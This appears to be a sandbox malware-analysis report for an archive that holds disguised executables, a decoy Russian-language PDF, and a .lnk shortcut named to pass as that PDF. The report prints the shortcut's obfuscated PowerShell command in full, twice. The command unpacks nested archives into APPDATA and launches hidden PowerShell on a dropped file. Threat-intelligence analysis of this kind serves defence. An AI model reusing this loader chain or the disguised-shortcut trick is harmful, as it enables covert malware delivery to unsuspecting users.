Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
4b94efa49fb59a43ac4a9fdf04c87ef6
Sha1
3d27e65ae5cb7aba8c529c8010b2414f24e4122b
Sha256
fe0d64d07ef03b2db6a7fa1ccbcc62c3f24f003d5f5726129ff22341321575b4
Sha384
c323040e6c4781e9c11aae78d12b763352f034702b323535ae13aeeb1382204c16c4e9f124824f4d01d1657c631360af
Sha512
63fda209808d66c4bce6d9550250217f1300cb57d6eeeefb8aa9d7da222a92bbb2ea96a43995be9a821303cd4656209810cf54e6f7aaa49681a71f50f19a32e5
SSDeep
393216:7xEj7DApaIMrPv0XmGWK4bEv7o7EPQGgdl:VE7G2GIg79Hkl
TLSH
30D633FE6BD2414A9B6221BBB0684FA0723041B47A098450FD97C7E9F2576D98B13CF7
File Structure
4b94efa49fb59a43ac4a9fdf04c87ef6
Malicious
FOUND.000
inactiveLinkOutput
primaryOutputCount
defaultDetailOutput
previousCommentCode
listFeedbackList
inactiveLabelResponse.xml
activeOutputPeriod.pub
libcrypto.dll
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
whatsapp.exe
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
messenger.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
externalTagName
activeOptionStatus
activeResourceList
activeOutputPeriod
primaryTaskName.xml
primaryPictureLimit
Proekt_prikaza_681_o_pooshrenii.pdf
Text (Preview)
Page #1
Page #2
Page #3
Page #4
Page #5
#Stream {38}
#Stream {1260}
#Stream {1261}
#Stream {1262}
#Stream {1263}
#Stream {1264}
#Stream {1265}
#Stream {1266}
#Stream {1267}
#Stream {146}
#Stream {147}
#Stream {148}
#Stream {149}
#Stream {150}
#Stream {151}
#Stream {152}
#Stream {153}
#Stream {154}
#Stream {155}
#Stream {156}
#Stream {157}
#Stream {158}
#Stream {159}
#Stream {160}
#Stream {161}
#Stream {162}
#Stream {163}
#Stream {164}
#Stream {1273}
#Stream {1268}
#Stream {1269}
#Stream {1270}
#Stream {1271}
#Stream {1272}
Structure
ssh-shellhost.exe
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
pinterest.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
androidstudio.exe
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
finalActionCategory
lastCssName
nextValueDate
Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
Informations
Name
 Value
Proekt_prikaza_681_o_pooshrenii.pdf

1.7
Proekt_prikaza_681_o_pooshrenii.pdf

1
Proekt_prikaza_681_o_pooshrenii.pdf

D:20241031010650-07'00'
Proekt_prikaza_681_o_pooshrenii.pdf

Acrobat PDFMaker 22 for Word
Proekt_prikaza_681_o_pooshrenii.pdf

Proekt_prikaza_681_o_pooshrenii.pdf

D:20251212064115-08'00'
Proekt_prikaza_681_o_pooshrenii.pdf

Proekt_prikaza_681_o_pooshrenii.pdf

П Р И К А З
Proekt_prikaza_681_o_pooshrenii.pdf

Adobe PDF Library 22.1.117
Proekt_prikaza_681_o_pooshrenii.pdf

1
Proekt_prikaza_681_o_pooshrenii.pdf

MoBIL GROUP
Proekt_prikaza_681_o_pooshrenii.pdf

D:20241031010650-07'00'
Proekt_prikaza_681_o_pooshrenii.pdf

Acrobat PDFMaker 22 for Word
Proekt_prikaza_681_o_pooshrenii.pdf

Proekt_prikaza_681_o_pooshrenii.pdf

D:20251212064115-08'00'
Proekt_prikaza_681_o_pooshrenii.pdf

Adobe PDF Library 22.1.117
Proekt_prikaza_681_o_pooshrenii.pdf

D:20241031080647
Proekt_prikaza_681_o_pooshrenii.pdf

Artefacts
Name
 Value
LNK: Command Execution

powershell.exe $externalModeType=([array](where.exe /r $env:USERPROFILE 'Proekt_prikaza_681_o_pooshrenii.zip'))[0].Trim(); &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $externalModeType -D $env:APPDATA\totalValueThreshold; $externalModeType=$env:APPDATA+'\totalValueThreshold\FOUND.000\inactiveLinkOutput'; $visibleHtmlCount=$externalModeType+'.zip'; ren $externalModeType -N $visibleHtmlCount; &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $visibleHtmlCount -D $env:APPDATA\davinciresolve; Start-Process -WindowStyle Hidden powershell (gc $env:APPDATA\davinciresolve\activeOptionStatus)
Deobfuscated PowerShell

(Get-Content $env:APPDATA\davinciresolve\activeOptionStatus)
4b94efa49fb59a43ac4a9fdf04c87ef6 (12.85 MB)
File Structure
4b94efa49fb59a43ac4a9fdf04c87ef6
Malicious
FOUND.000
inactiveLinkOutput
primaryOutputCount
defaultDetailOutput
previousCommentCode
listFeedbackList
inactiveLabelResponse.xml
activeOutputPeriod.pub
libcrypto.dll
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
whatsapp.exe
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
messenger.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
externalTagName
activeOptionStatus
activeResourceList
activeOutputPeriod
primaryTaskName.xml
primaryPictureLimit
Proekt_prikaza_681_o_pooshrenii.pdf
Text (Preview)
Page #1
Page #2
Page #3
Page #4
Page #5
#Stream {38}
#Stream {1260}
#Stream {1261}
#Stream {1262}
#Stream {1263}
#Stream {1264}
#Stream {1265}
#Stream {1266}
#Stream {1267}
#Stream {146}
#Stream {147}
#Stream {148}
#Stream {149}
#Stream {150}
#Stream {151}
#Stream {152}
#Stream {153}
#Stream {154}
#Stream {155}
#Stream {156}
#Stream {157}
#Stream {158}
#Stream {159}
#Stream {160}
#Stream {161}
#Stream {162}
#Stream {163}
#Stream {164}
#Stream {1273}
#Stream {1268}
#Stream {1269}
#Stream {1270}
#Stream {1271}
#Stream {1272}
Structure
ssh-shellhost.exe
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
pinterest.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
androidstudio.exe
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
finalActionCategory
lastCssName
nextValueDate
Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe $externalModeType=([array](where.exe /r $env:USERPROFILE 'Proekt_prikaza_681_o_pooshrenii.zip'))[0].Trim(); &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $externalModeType -D $env:APPDATA\totalValueThreshold; $externalModeType=$env:APPDATA+'\totalValueThreshold\FOUND.000\inactiveLinkOutput'; $visibleHtmlCount=$externalModeType+'.zip'; ren $externalModeType -N $visibleHtmlCount; &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $visibleHtmlCount -D $env:APPDATA\davinciresolve; Start-Process -WindowStyle Hidden powershell (gc $env:APPDATA\davinciresolve\activeOptionStatus)

Malicious

4b94efa49fb59a43ac4a9fdf04c87ef6 > Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk
Deobfuscated PowerShell

(Get-Content $env:APPDATA\davinciresolve\activeOptionStatus)

Malicious

4b94efa49fb59a43ac4a9fdf04c87ef6 > Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙